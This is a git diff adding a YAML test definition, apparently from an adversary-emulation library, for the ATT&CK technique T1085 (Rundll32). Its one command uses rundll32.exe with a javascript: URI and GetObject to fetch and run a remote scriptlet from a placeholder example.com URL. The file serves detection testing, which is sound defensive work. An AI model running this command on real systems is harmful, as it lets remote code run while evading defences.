diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
new file mode 100644
index 00000000..b1628ac6
--- /dev/null
+++ b/atomics/t1085/t1085.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1085
+display_name: Rundll32
+atomic_tests:
+- name: Rundll32 execute JavaScript Remote Payload With GetObject
+  description: |
+    Test execution of a remote script using rundll32.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    file_url:
+      description: location of the payload
+      type: Url
+      default: https://www.example.com/1085.sct
+  executor:
+    name: command_prompt
+    command: |
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"